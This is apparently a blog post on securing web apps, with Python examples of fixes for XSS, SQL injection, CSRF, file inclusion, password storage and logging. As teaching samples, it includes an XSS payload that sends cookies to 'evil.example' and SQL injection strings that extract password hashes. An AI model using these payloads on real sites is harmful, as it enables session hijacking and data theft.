Top 12 Practices to Develop & Secure a Web App
BLOG / Web Development 10 May 2023
As more companies switch to a work-from-home culture, the use of cloud-based web apps has skyrocketed, and more businesses are converting their enterprise systems into web apps to reap the benefits.
For starters, a web app doesn’t require any download or installation, since it can be accessed from any internet-enabled device. That boosts productivity and saves companies valuable resources.
However, the rise of web applications has also brought a rise in security incidents. One industry report traces almost 50% of data breaches back to web applications; another found 98% of the web applications it tested to be vulnerable to attack.
And in 2022 the average cost of a data breach was $4.35 million, up 2.6% from the previous year, a number that is only expected to grow in the coming years.
All of these figures tell us that vulnerabilities are widespread in web apps and that something must be done about it. So today we will look at how to secure a web app, starting with the vulnerabilities most commonly found in them.
Common vulnerabilities of web apps
Vulnerabilities in web applications allow malicious actors to gain unauthorized access, change source code, steal confidential data, or interfere with the application’s operations.
That’s why fixing these vulnerabilities should be a top priority: they pose a serious threat to data security and can cause real financial loss.
Let’s look at some common vulnerabilities of web apps:
Cross-site scripting (XSS)
This is an attack in which the application’s users, not the server, are the target. The attacker gets script of their choosing to run in a victim’s browser in the context of the application, which lets them steal session cookies and tokens, act as the user, rewrite page content, or deliver malware.
The two classic variants are stored XSS and reflected XSS. In stored XSS the payload is persisted by the application (in a comment, profile field, or message) and served to every user who later views that data. In reflected XSS the payload arrives in the request itself, typically a query parameter, and is echoed into the response, so the attacker has to lure the victim into following a crafted link. A third variant, DOM-based XSS, never touches the server at all: client-side JavaScript writes untrusted data into the page.
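As an added illustration (not code from the original post), the following Python shows the shared sink behind stored and reflected XSS: untrusted text concatenated into HTML. The attacker comment, the function names, and the link renderer are constructed for this example; the fix is context-aware escaping with the standard library’s html.escape, plus a scheme allowlist for the attribute case that escaping alone cannot cover.

```python
import html
import re

# Constructed attacker payload. It works unchanged for stored XSS (saved as a
# comment, then rendered for every visitor) and reflected XSS (echoed straight
# back from a query parameter): the sink, untrusted text pasted into HTML, is
# the same in both cases.
ATTACKER_COMMENT = (
    '<img src=x onerror="fetch(\'https://evil.example/?c=\'+document.cookie)">'
)


def render_comment_unsafe(author: str, body: str) -> str:
    """Vulnerable: user-controlled strings are concatenated into markup as-is."""
    return f"<p><b>{author}</b>: {body}</p>"


def render_comment_safe(author: str, body: str) -> str:
    """Hardened: escape for the HTML text context before interpolation.
    html.escape turns < > & " ' into entities, so the browser shows the
    payload as text instead of parsing it as a tag."""
    return "<p><b>{}</b>: {}</p>".format(
        html.escape(author, quote=True), html.escape(body, quote=True)
    )


def render_link_safe(label: str, url: str) -> str:
    """Attribute context: escape the value AND restrict the scheme, because a
    javascript: URL survives escaping untouched yet still runs when clicked."""
    if not url.lower().startswith(("http://", "https://")):
        url = "#"
    return '<a href="{}">{}</a>'.format(html.escape(url, quote=True), html.escape(label))


def count_tags(rendered: str) -> int:
    """Number of real tags the browser will parse in the output. The template
    itself contributes four (<p>, <b>, </b>, </p>); anything beyond that was
    injected by the user."""
    return len(re.findall(r"</?[a-zA-Z]", rendered))
```

Escaping is per context: the same value needs different treatment inside a script block, a URL, or a CSS property, which is why a templating engine with automatic contextual escaping beats hand-rolled string building.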
SQL Injection
In this type of attack, crafted input (a form field, URL parameter, or header) is placed into a SQL query as if it were part of the query’s code, so the attacker changes what the database executes. The flaw lives in the application code that builds queries by string concatenation, not in the database itself, which is why parameterized queries are the fix.
As a result, the attacker can read data they are not authorized to see, including other users’ records and credentials, and modify, delete, or add records.
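The following Python example is added here and is not from the original post. It uses an in-memory SQLite table (constructed) to show a query built by string formatting falling to two classic payloads, a tautology that returns every row and a UNION that pulls password hashes out of the same table, and the parameterized query that treats the identical input as data.

```python
import sqlite3

# Constructed stand-in for the application's users table.
def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
        "password_hash TEXT, is_admin INTEGER)"
    )
    conn.executemany(
        "INSERT INTO users (username, password_hash, is_admin) VALUES (?, ?, ?)",
        [("alice", "h1", 1), ("bob", "h2", 0), ("carol", "h3", 0)],
    )
    return conn


def find_user_vulnerable(conn: sqlite3.Connection, username: str):
    """Vulnerable: the username is pasted into the SQL text, so a quote in the
    input closes the string literal and the rest becomes SQL."""
    sql = "SELECT username, is_admin FROM users WHERE username = '%s'" % username
    return conn.execute(sql).fetchall()


def find_user_parameterized(conn: sqlite3.Connection, username: str):
    """Hardened: the value is bound as a parameter; the database driver never
    lets it alter the query's structure, whatever characters it contains."""
    return conn.execute(
        "SELECT username, is_admin FROM users WHERE username = ?", (username,)
    ).fetchall()


# Constructed attacker inputs.
TAUTOLOGY_PAYLOAD = "nobody' OR '1'='1"
# Closes the literal, appends a UNION that reads another column, and comments
# out the trailing quote the application adds.
UNION_PAYLOAD = "x' UNION SELECT username, password_hash FROM users--"
```

Parameterization protects values only; table and column names chosen by the user must still be checked against an allowlist, since they cannot be bound as parameters.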
Cross-site request forgery (CSRF)
In a typical CSRF attack, the attacker lures a logged-in user to a page they control; that page makes the user’s browser send a request to the vulnerable application, and because the browser attaches the session cookie automatically, the application treats the forged request as the user’s own.
This lets the attacker do anything the user could do through their account, such as changing the e-mail address or password or transferring funds, without the user’s knowledge. The defence is a per-session anti-CSRF token in the page or form that the attacker’s site cannot read, backed by the SameSite attribute on the session cookie.
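The token check described above, as an added Python example that is not part of the original post. The endpoint, request shape, and session identifiers are constructed for illustration; the token is a random nonce bound to the session with an HMAC under a server-side key so that it cannot be forged, guessed, or reused from another session.

```python
import hashlib
import hmac
import secrets
from typing import Optional, Tuple

# Assumed per-deployment secret; in a real app it comes from configuration, not the repo.
SERVER_KEY = secrets.token_bytes(32)


def issue_csrf_token(session_id: str) -> str:
    """token = nonce '.' HMAC(key, session_id ':' nonce). The MAC ties the
    token to one session, so a token from another session fails to verify."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(SERVER_KEY, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def verify_csrf_token(session_id: str, token: Optional[str]) -> bool:
    if not token or "." not in token:
        return False
    nonce, mac = token.split(".", 1)
    expected = hmac.new(SERVER_KEY, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)  # constant-time comparison


def handle_change_email(request: dict) -> Tuple[int, str]:
    """Hypothetical state-changing endpoint. The session cookie arrives with any
    cross-site request (that is what CSRF abuses); the token does not, because
    it lives in the form body, which the attacker's page cannot read."""
    session_id = request.get("cookies", {}).get("session")
    if not session_id:
        return 401, "not logged in"
    if request.get("method") != "POST":
        return 405, "state changes must use POST"
    if not verify_csrf_token(session_id, request.get("form", {}).get("csrf_token")):
        return 403, "CSRF check failed"
    return 200, "email changed to %s" % request["form"]["email"]
```

Setting the session cookie with SameSite=Lax (or Strict) stops the browser from attaching it to most cross-site POSTs in the first place; the token remains the primary control because older clients and some cross-site navigations do not honour SameSite.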
Remote file inclusion (RFI)
An RFI vulnerability arises when an application builds the path of a file it includes or executes from user input (the classic case is a page parameter passed to a PHP include) and allows that path to be a URL. The attacker points it at a script they host, the server fetches and runs it, and from there the attacker can steal data or take over the whole web server.
So, how do you secure a web app against RFI? Never pass user input to an include; resolve includes only against an allowlist of local names. More broadly, writing secure code, validating inputs, and encoding outputs go a long way, but adopting best practices is only one part of developing a protected web application.
A more comprehensive approach involves security testing at every stage of the development process, which increases the chances of finding a vulnerability in the code and fixing it in time.
Often it is third-party components that introduce vulnerabilities into a web application. So while it is crucial to scan your own code, it is just as essential to examine the third-party components you depend on on a regular basis.
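The allowlisted include resolver mentioned above, as an added Python example rather than code from the original post. The base directory and the set of page names are assumed; the function rejects anything with a URL scheme (http://, php://, data: and so on), anything not on the allowlist, and, as defence in depth, any resolved path that escapes the base directory.

```python
import os
from urllib.parse import urlparse

# Assumed location of the includable templates and the allowlist of names.
BASE_DIR = os.path.realpath("/srv/app/pages")
ALLOWED_PAGES = {"home", "about", "contact"}


def resolve_include(page: str):
    """Return the absolute path to include, or None if the request is rejected.
    An RFI-vulnerable app would do include(page) directly, so that
    ?page=https://evil.example/shell.txt pulls attacker code into the server."""
    if not isinstance(page, str) or not page:
        return None
    if urlparse(page).scheme:          # any scheme at all: http, https, ftp, php, data, file
        return None
    if page not in ALLOWED_PAGES:      # allowlist, not a blocklist of bad characters
        return None
    candidate = os.path.realpath(os.path.join(BASE_DIR, page + ".html"))
    # Defence in depth: even an allowlisted name must resolve inside BASE_DIR.
    if os.path.commonpath([BASE_DIR, candidate]) != BASE_DIR:
        return None
    return candidate
```

The same pattern (map a short identifier to a server-chosen path, never the other way round) also closes local file inclusion and path traversal, which are the usual companions of RFI.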
12 best practices for securing a web app
We’re back to the central question: how to secure a web app? I’ve prepared a list of 12 best practices to safeguard your web application against attacks; check them out:
1. Require input validation
Sometimes it pays to be paranoid, and requiring input validation is one of those payoffs. Treat every input as hostile until it has been proven otherwise, and that includes headers, cookies, and API bodies, not just form fields.
Input validation is the practice of making sure that only suitable and acceptable data makes its way into your web application. It stops a large class of attacks that rely on malformed, oversized, or out-of-range data being processed.
When we talk about input validation, it means validating data type, format, and value. Let’s take a quick look at each of them:
- Data type validation – parameters are checked to be of the correct type (text, numeric, alphanumeric, boolean, and so on), and type confusion such as a string where an integer is expected is rejected.
- Data value validation – parameters are checked to be within an acceptable length or range. For example, an e-mail address field can be capped at 254 characters, the practical maximum allowed by the mail standards, and a quantity field limited to the values the business actually supports.
- Data format validation – only input in the expected format is accepted, whether that is an e-mail address or ISO date in a form field or a well-formed JSON or XML body in an API request.
Another thing to remember is to validate both syntactically and semantically. Syntactic validation accepts only well-formed values; semantic validation checks that the values make sense together (for example, the end date must be later than the start date). Prefer allowlists of what is valid over blocklists of what is known to be bad, and always validate on the server, since client-side checks can be bypassed.
Follow these techniques consistently and you will already be ahead of most web apps in terms of security.
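The validation steps above carried through for one constructed request, as an added Python example that is not part of the original post. The payload fields (email, guests, start, end) and their limits are assumptions chosen for illustration; the function runs type, length, and format checks first and the semantic date-order rule last, returning every problem found rather than stopping at the first.

```python
import re
from datetime import date
from typing import List, Optional

EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")
MAX_EMAIL_LEN = 254          # practical upper bound from the mail RFCs
MAX_GUESTS = 10              # assumed business limit


def _parse_iso_date(value) -> Optional[date]:
    """Format check (YYYY-MM-DD) followed by a calendar check (2023-02-30 fails)."""
    if not isinstance(value, str) or not re.fullmatch(r"\d{4}-\d{2}-\d{2}", value):
        return None
    try:
        return date.fromisoformat(value)
    except ValueError:
        return None


def validate_booking(payload: dict) -> List[str]:
    """Return a list of error strings; an empty list means the input is accepted.
    Hypothetical booking payload: {"email", "guests", "start", "end"}."""
    errors = []

    email = payload.get("email")
    if not isinstance(email, str):                      # type
        errors.append("email: must be a string")
    elif len(email) > MAX_EMAIL_LEN:                    # value (length)
        errors.append("email: too long")
    elif not EMAIL_RE.match(email):                     # format
        errors.append("email: invalid format")

    guests = payload.get("guests")
    # bool is a subclass of int in Python, so True would otherwise pass as 1.
    if not isinstance(guests, int) or isinstance(guests, bool):
        errors.append("guests: must be an integer")
    elif not 1 <= guests <= MAX_GUESTS:                 # value (range)
        errors.append("guests: must be between 1 and %d" % MAX_GUESTS)

    start = _parse_iso_date(payload.get("start"))
    end = _parse_iso_date(payload.get("end"))
    if start is None:
        errors.append("start: must be YYYY-MM-DD")
    if end is None:
        errors.append("end: must be YYYY-MM-DD")
    if start is not None and end is not None and end <= start:   # semantic
        errors.append("end: must be after start")
    return errors
```

Rejecting with a specific list of errors is fine here because the errors describe the caller’s input, not the server’s internals; the generic-message rule in the exception management section applies to unexpected failures, not to validation feedback.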
2. Use data encryption
Encryption transforms data with a key so that only someone who holds the key can read it. It is not encoding or obfuscation, which anyone can reverse. Encryption in transit does not stop someone from intercepting the traffic, but it makes what they intercept unreadable and, with modern protocols, detectably tampered with.
Passwords are a special case: they should not be encrypted at all but hashed with a slow, salted password-hashing algorithm such as bcrypt, scrypt, or Argon2, because nothing in the application should ever need to recover the original password. Say a user sets the password “ILoveCanadianDigitalConsulting”. Instead of saving it in plain text, the application stores a derived value that looks like “KdOHlsHMR1GuCVR0CnMunEtMqZxTkhsHN6FVHDJZB3I=”.
The stored value cannot be turned back into the password, even by someone who gets unauthorized access to the database, and the slow algorithm makes guessing passwords offline expensive.
To get the most out of encryption, use it whenever data moves in or out of the application and also at rest for sensitive fields. The different components of your app should talk to each other over TLS too, not just to the browser.
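The password example above, done properly, as an added Python example that is not from the original post. It uses PBKDF2-HMAC-SHA256 from the standard library (chosen because it needs no third-party package; Argon2id is preferable where a library is available) with a random per-user salt and an iteration count from current OWASP guidance, and stores the parameters alongside the digest so they can be raised later without breaking verification.

```python
import base64
import hashlib
import hmac
import os

# Assumed parameters: OWASP's 2023 recommendation for PBKDF2-HMAC-SHA256 is
# 600,000 iterations; raise it as hardware gets faster.
ITERATIONS = 600_000
SALT_BYTES = 16
DK_BYTES = 32


def hash_password(password: str) -> str:
    """One-way: random salt plus a deliberately slow key derivation. There is no
    key that can 'decrypt' the result; verification recomputes and compares."""
    salt = os.urandom(SALT_BYTES)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS, DK_BYTES)
    return "pbkdf2_sha256$%d$%s$%s" % (
        ITERATIONS,
        base64.b64encode(salt).decode("ascii"),
        base64.b64encode(dk).decode("ascii"),
    )


def verify_password(password: str, stored: str) -> bool:
    """Parse the stored record, re-derive with the same salt and iteration
    count, and compare in constant time. Malformed records verify as False."""
    try:
        algo, iterations, salt_b64, dk_b64 = stored.split("$")
        if algo != "pbkdf2_sha256":
            return False
        salt = base64.b64decode(salt_b64)
        expected = base64.b64decode(dk_b64)
        dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, int(iterations), len(expected))
    except (ValueError, TypeError):
        return False
    return hmac.compare_digest(dk, expected)


def needs_rehash(stored: str) -> bool:
    """True when the record was made with fewer iterations than the current
    policy; call hash_password again on the next successful login."""
    try:
        algo, iterations, _, _ = stored.split("$")
    except ValueError:
        return True
    return algo != "pbkdf2_sha256" or int(iterations) < ITERATIONS
```

Because the salt is random, hashing the same password twice yields different records, which is what defeats precomputed tables; a plain SHA-256 of the password, which the base64 string in the post resembles, has neither the salt nor the cost factor and falls to GPU guessing in minutes.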
3. Check security configurations
A typical web server and its management tooling offer many options for securing a web app. The flip side is that so many options mean more ways to get things wrong.
Therefore, everything from setting up a new website to configuring the web server must be looked at from a security point of view.
Documenting (and better still, automating) the whole process of setting up websites and servers is the most practical way to prevent security misconfiguration, because a documented baseline can be reviewed, diffed, and re-applied.
Some of the typical reasons that can lead to a security misconfiguration are given below:
- Directory listing enabled, or files and paths left reachable that should not be
- Guest or default accounts (and default passwords) left on the server
- Expired digital certificates
- Obsolete protocol versions and cipher suites still enabled (for example, TLS 1.0 or 1.1)
- Unused ports left open on the server
- Outdated software libraries and server components
Misconfigured server and website settings are one of the most common root causes of web app breaches. So it is worth going over these settings before moving on to more complex measures.
4. Use HTTPS (Hypertext Transfer Protocol Secure)
Another way to amp up the security of a web application is to serve it over HTTPS rather than plain HTTP.
HTTPS runs HTTP over TLS (Transport Layer Security, the successor to the now-deprecated SSL), which creates an encrypted and authenticated connection between the user’s browser and the web app. All data between the browser and the server stays private and cannot be altered in transit without detection.
Today, around 81.9% of websites use HTTPS as their default protocol. The technology is even more common among online marketplaces and e-commerce sites as they require online transactions.
Additionally, every third-party component the web application loads should be referenced over HTTPS, and the server should send an HTTP Strict-Transport-Security header so browsers never fall back to HTTP.
Linking to external resources such as JavaScript, CSS stylesheets, and other files over HTTP from an HTTPS page (mixed content) lets an attacker on the network replace those files and undermines the protection of the whole page; modern browsers block most of it outright.
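A mixed-content check for the point above, as an added Python example that is not part of the original post. It uses the standard library’s HTMLParser to list scripts, stylesheets, images, and frames loaded over plain http://; the sample page is constructed. Navigational links (a href) are deliberately not flagged, since following a link is a new page load rather than a subresource of this one, and scheme-relative // references inherit HTTPS on an HTTPS page.

```python
from html.parser import HTMLParser
from typing import List, Tuple


class InsecureSubresourceFinder(HTMLParser):
    """Collects (tag, url) pairs for subresources fetched over plain HTTP."""
    WATCHED = {"script": "src", "link": "href", "img": "src", "iframe": "src"}

    def __init__(self):
        super().__init__()
        self.findings: List[Tuple[str, str]] = []

    def handle_starttag(self, tag, attrs):
        attr_name = self.WATCHED.get(tag)
        if attr_name is None:
            return
        value = dict(attrs).get(attr_name) or ""
        if value.strip().lower().startswith("http://"):
            self.findings.append((tag, value))


def find_insecure_subresources(html_text: str) -> List[Tuple[str, str]]:
    parser = InsecureSubresourceFinder()
    parser.feed(html_text)
    parser.close()
    return parser.findings


# Constructed sample page: two insecure subresources, two secure ones, one
# scheme-relative image, and a plain-HTTP navigation link that is not flagged.
SAMPLE_PAGE = """<!doctype html>
<html><head>
<link rel="stylesheet" href="https://cdn.example.com/site.css">
<link rel="stylesheet" href="http://cdn.example.com/legacy.css">
<script src="http://analytics.example.net/track.js"></script>
<script src="https://cdn.example.com/app.js"></script>
</head><body>
<img src="//images.example.com/logo.png">
<a href="http://partner.example.org/">partner</a>
</body></html>
"""
```

Run it over rendered pages in CI, or add a Content-Security-Policy with upgrade-insecure-requests so the browser rewrites any stragglers to HTTPS.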
5. Use authentication and access control
Account management practices such as multi-factor authentication, strong password enforcement, and a secure password recovery mechanism are at the heart of building a secure web application.
Similarly, require re-authentication when users access sensitive features such as changing their password or e-mail address or viewing personal information.
By default, a web application should grant users (and its own service accounts) only the minimum privileges they need, and elevate only for the moment a sensitive action is performed. Users rarely change their e-mail or password, so asking them to re-authenticate when they do costs little and stops an attacker who has hijacked a session from taking over the account outright.
Other controls worth enforcing are e-mail confirmation of new addresses, account lock-out after repeated failed logins, and expiry of sessions after an extended period of inactivity. Forced periodic password expiration, on the other hand, is no longer recommended (NIST SP 800-63B advises against it); screening new passwords against known-breached password lists is more effective.
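The step-up re-authentication and lock-out rules above, as an added Python example that is not part of the original post. The time windows, attempt limit, and the set of sensitive actions are assumed policy values; the session is a plain dict so the logic runs stand-alone.

```python
from datetime import datetime, timedelta
from typing import Optional

# Assumed policy values.
REAUTH_WINDOW = timedelta(minutes=5)      # how recent the last login must be for sensitive actions
MAX_FAILURES = 5                          # failed logins before lock-out
LOCKOUT = timedelta(minutes=15)
SENSITIVE_ACTIONS = {"change_password", "change_email", "view_profile_pii"}


class Account:
    def __init__(self):
        self.failures = 0
        self.locked_until: Optional[datetime] = None


def record_login_attempt(acct: Account, password_ok: bool, now: datetime) -> bool:
    """Return True if the login is accepted. While locked, even a correct
    password is refused, which is what makes online guessing unprofitable."""
    if acct.locked_until is not None and now < acct.locked_until:
        return False
    if password_ok:
        acct.failures = 0
        acct.locked_until = None
        return True
    acct.failures += 1
    if acct.failures >= MAX_FAILURES:
        acct.locked_until = now + LOCKOUT
        acct.failures = 0
    return False


def authorize(session: dict, action: str, now: datetime) -> str:
    """'allow', 'reauth', or 'deny'. Sensitive actions need an authentication
    event within REAUTH_WINDOW, however long the session has been open."""
    if not session.get("user"):
        return "deny"
    if action in SENSITIVE_ACTIONS and now - session["last_auth_at"] > REAUTH_WINDOW:
        return "reauth"
    return "allow"
```

On a successful re-authentication the handler updates last_auth_at and retries the action; lock-out state belongs on the account, not the session, so an attacker cannot reset it by starting a new session.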
6. Utilize exception management
The next best practice on our list of how to secure a web app is exception management.
Exception management is the practice of showing only a generic message to the user whenever a failure happens in a web app, while recording the full details server-side.
Detailed system messages do the end user no good. Worse, stack traces, SQL errors, file paths, and version strings provide exactly the clues an attacker needs to break through your web app’s security.
A web application following good security practices should have exactly three outcomes for any request:
- Allow
- Reject
- Handle
For example, if a third-party component fails, display a friendly message (ideally with a reference number the user can quote to support). A message revealing that XYZ’s component is not working, complete with its error text, is no help to the user but is useful reconnaissance for an attacker.
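The allow/reject/handle split implemented as a request wrapper, as an added Python example that is not from the original post. The handlers and the failing payment gateway message are constructed; the wrapper logs the traceback under a random incident id and returns only the generic message plus that id, so nothing about internal hosts or credentials reaches the client.

```python
import logging
import traceback
import uuid
from typing import Callable, Tuple

log = logging.getLogger("app")
GENERIC_ERROR = "Something went wrong. Please quote the incident id to support."


def handle_request(handler: Callable[[dict], dict], request: dict) -> Tuple[int, dict]:
    """Allow: handler returns normally (200). Reject: the caller's input was bad
    (400, a short reason that describes their input, not our internals).
    Handle: anything else is logged in full server-side and answered with a
    generic message and a correlation id (500)."""
    try:
        return 200, handler(request)
    except (ValueError, KeyError):
        return 400, {"error": "invalid request"}
    except Exception:
        incident = uuid.uuid4().hex
        # Full detail, including the traceback, goes to the server log only.
        log.error("incident %s\n%s", incident, traceback.format_exc())
        return 500, {"error": GENERIC_ERROR, "incident_id": incident}


# Hypothetical handlers.
def quantity_handler(request: dict) -> dict:
    return {"total": int(request["qty"]) * 5}


def payment_handler(request: dict) -> dict:
    # Constructed failure mimicking what a gateway client might raise.
    raise ConnectionError(
        "gateway pg-03.internal:8443 refused: invalid API key sk_live_REDACTED"
    )
```

The same incident id written to the log and shown to the user is what lets support find the real error without the error itself ever leaving the server; make sure the logging side is not also writing request bodies that contain passwords or card numbers.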
7. Audit and logging
Auditing and logging are another best practice that can help you secure a web application. Thankfully, most web servers log every request automatically, and the logs can be viewed through the server management software.
However, just because the web server logs information doesn’t mean your job is done. To stay ahead of attackers, you must establish a routine of reviewing the logs, ideally with automated alerting, to notice suspicious activity.
For instance, suppose you find that a bot from a particular network is trying to access a long list of sub-directories on your web application. The logs tell you its user agent, IP address, request paths, and timing, and that information can be used to block it at the server or firewall.
Similarly, the log files include application errors that might not be noticeable at first glance, so another benefit of audit logging is that you can notice and rectify application errors.
And last but not least, the logs of your web application can play a key role in incident investigations and legal proceedings, so protect their integrity and keep them for a defined retention period. (In the case of a VPN service, it is not uncommon for companies to be compelled to share logs with the authorities.)
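The directory-probing bot from the example above, detected over a few constructed access-log lines in the common combined format, as an added Python example that is not part of the original post. A client that produces many 404s across many distinct paths is flagged together with its user agent; the thresholds are assumed and would be tuned to the site’s normal traffic.

```python
import re
from collections import defaultdict
from typing import Dict, Iterable

# Apache/nginx "combined" format: ip ident user [time] "req" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Constructed sample: one browser user, one scanner probing for admin panels,
# dotfiles, and backups.
SAMPLE_LOG = """
198.51.100.7 - - [10/May/2023:12:00:00 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/113.0"
198.51.100.7 - - [10/May/2023:12:00:02 +0000] "GET /favicon.ico HTTP/1.1" 404 153 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/113.0"
203.0.113.42 - - [10/May/2023:12:00:05 +0000] "GET /admin/ HTTP/1.1" 404 153 "-" "python-requests/2.28.2"
203.0.113.42 - - [10/May/2023:12:00:05 +0000] "GET /wp-login.php HTTP/1.1" 404 153 "-" "python-requests/2.28.2"
203.0.113.42 - - [10/May/2023:12:00:06 +0000] "GET /.env HTTP/1.1" 404 153 "-" "python-requests/2.28.2"
203.0.113.42 - - [10/May/2023:12:00:06 +0000] "GET /backup.zip HTTP/1.1" 404 153 "-" "python-requests/2.28.2"
203.0.113.42 - - [10/May/2023:12:00:07 +0000] "GET /phpmyadmin/ HTTP/1.1" 404 153 "-" "python-requests/2.28.2"
203.0.113.42 - - [10/May/2023:12:00:07 +0000] "GET /.git/config HTTP/1.1" 404 153 "-" "python-requests/2.28.2"
198.51.100.7 - - [10/May/2023:12:00:09 +0000] "POST /login HTTP/1.1" 302 0 "https://app.example/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/113.0"
""".strip().splitlines()


def parse(lines: Iterable[str]):
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            yield m.groupdict()


def find_enumerators(lines: Iterable[str], min_404s: int = 5, min_distinct_paths: int = 5) -> Dict[str, dict]:
    """Map of client IP -> summary for clients whose 404 volume and path spread
    look like enumeration rather than a user hitting one broken link."""
    per_ip = defaultdict(lambda: {"404s": 0, "paths": set(), "ua": ""})
    for rec in parse(lines):
        entry = per_ip[rec["ip"]]
        entry["ua"] = rec["ua"]
        if rec["status"] == "404":
            entry["404s"] += 1
            entry["paths"].add(rec["path"])
    return {
        ip: {"404s": e["404s"], "distinct_paths": len(e["paths"]), "user_agent": e["ua"], "paths": sorted(e["paths"])}
        for ip, e in per_ip.items()
        if e["404s"] >= min_404s and len(e["paths"]) >= min_distinct_paths
    }
```

Paths such as /.env, /.git/config, and /backup.zip are also worth alerting on individually, regardless of volume, because a 200 on any of them is a leak in progress rather than a probe.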
8. Rigorous container management
These days it is common for web applications to be deployed in containers with Docker. Containers help with scalability and quick deployment, but without proper management they can also introduce security issues.
To ensure that you follow the correct security measures for containers, follow these tips:
- Secrets – Do not bake sensitive information into a container image, for example via ENV or COPY in the Dockerfile. Anything in an image layer is readable by anyone who can pull the image and ends up in every container created from it. Use Docker’s secrets mechanism, or your orchestrator’s equivalent, to supply secrets at runtime.
- Root access – Containers run as root by default, and at first that may seem harmless. But if the container is compromised, a root process makes it far easier to escape to the host and affect the whole system rather than one container. Create an unprivileged user in the image and switch to it with a USER instruction.
- Trusted images – Make it a habit to use only images that come from a trusted source, are pinned to a specific tag or digest, and have been scanned for vulnerabilities. In fact, scan your own images before using them to create containers.
- Network segmentation – Allow a container to reach other systems only when absolutely required, and keep containers in their own protected networks unless there is a reason not to.
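A small Dockerfile audit covering the first three tips, as an added Python example that is not part of the original post. The two Dockerfiles are constructed (the first breaks every rule, the second follows them), and the checks are a deliberately simple subset of what a linter such as hadolint does: unpinned base image, secrets passed through ENV or ARG, and no non-root USER before the entrypoint.

```python
import re
from typing import List

SECRET_KEY_RE = re.compile(r"(PASSWORD|SECRET|TOKEN|API_KEY)(=|\s|$)", re.IGNORECASE)


def audit_dockerfile(text: str) -> List[str]:
    """Return a list of findings; an empty list means the three checks passed.
    Only the last USER instruction counts, since that is the user the
    ENTRYPOINT/CMD process will run as (multi-stage builds: the final stage)."""
    findings = []
    last_user = "root"  # Docker's default when no USER instruction is present
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        instr, _, rest = line.partition(" ")
        instr = instr.upper()
        if instr == "FROM":
            image = rest.split()[0]
            if "@sha256:" not in image and (":" not in image or image.endswith(":latest")):
                findings.append("FROM %s: pin a specific tag or digest, not latest" % image)
        elif instr in ("ENV", "ARG") and SECRET_KEY_RE.search(rest):
            findings.append("%s %s: secret baked into an image layer" % (instr, rest.split()[0]))
        elif instr == "USER":
            last_user = rest.strip()
    if last_user.split(":")[0] in ("root", "0"):
        findings.append("no non-root USER: the container process runs as root")
    return findings


# Constructed: the anti-pattern.
BAD_DOCKERFILE = """
FROM python:latest
ENV DB_PASSWORD=hunter2
COPY . /app
CMD ["python", "/app/main.py"]
"""

# Constructed: pinned base image, secret supplied at runtime, unprivileged user.
GOOD_DOCKERFILE = """
FROM python:3.11-slim
ENV TOKEN_TTL_SECONDS=3600
RUN useradd --create-home --uid 10001 app
COPY --chown=app:app . /app
USER app
CMD ["python", "/app/main.py"]
"""
```

Pinning by digest (image@sha256:…) is stronger than a tag, because a tag can be re-pointed upstream; whichever you use, rebuild and rescan regularly so the pin does not freeze known-vulnerable packages in place.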
9. Quality assurance (QA) and testing
In-house testing and quality assurance (QA) of web applications are standard practice. However, that is usually not enough to uncover every security loophole.
Another way to assure the security of a web application is therefore to hire a third party for vulnerability scanning and penetration testing.
It can be hard for developers to spot bugs or security loopholes in their own code, but a fresh pair of experienced eyes will often find what was missed.
As for in-house testing, create a well-documented, repeatable process so the testing and QA team can check the web application against every item on the list, and include security test cases (injection, authentication, access control) alongside the functional ones.
10. DDOS protection
Distributed denial of service (DDoS) attacks are a common cause of service disruption. In a typical DDoS attack, a botnet sends a huge volume of traffic to the web app in a short time, overloading the servers and taking the service down.
A prolonged service disruption eventually leads to financial loss and even makes the customers move away to a competitor.
For a small business, a DDoS attack can cause damage of around $120,000, and for large corporations the cost can reach $2 million. Additionally, 16 DDoS attacks happen every minute on average.
So there is no doubt that DDoS presents a severe threat to the availability of a web application. That’s why another way to secure your web app is to put it behind a DDoS protection service.
Some well-known DDoS protection services include Cloudflare, Radware, and Imperva. Besides DDoS protection, most of them also offer a CDN, which can even improve the performance of your web application.
11. Use secure SDLC management
A secure software development life cycle (SSDLC) is a framework that builds security into every phase of development rather than bolting it on at the end.
So while you take measures to protect your web app once it is built, you can also follow the SSDLC to ensure security during the development phase.
Some of the critical points of secure SDLC management include:
- Development and maintenance of the web app by adequately trained staff.
- A secure build environment.
- Secure delivery of the app to the end user.
- Ongoing security training for the developers.
- Securing the third-party libraries and open-source code in the app, and keeping an inventory of them.
12. Automate security tasks
A manual approach is fine for complex security issues. But for routine tasks it is usually best to automate, as it saves valuable time and lets your team focus on the security work that can’t be automated.
If you think about it, fixing even simple vulnerabilities takes a lot of time. New vulnerabilities are discovered every day, and it doesn’t make sense to handle everything by hand. So take full advantage of automating any security task that can be automated.
Tools exist for most of this: static application security testing (SAST) tools such as Snyk Code find vulnerabilities in your own code, and software composition analysis (SCA) tools flag vulnerable third-party dependencies. Both can run in your CI pipeline on every commit.
To sum it all up
There is no way around taking a proactive approach to keeping your web app secure from attack. We have listed 12 best practices that can help you keep your web application safe and well-protected.
But running tools and following checklists only goes so far. If your application’s code is not built with security in mind, keeping it safe becomes an uphill battle.
That’s why it is always best to have a team that can build a secure web app from the ground up.
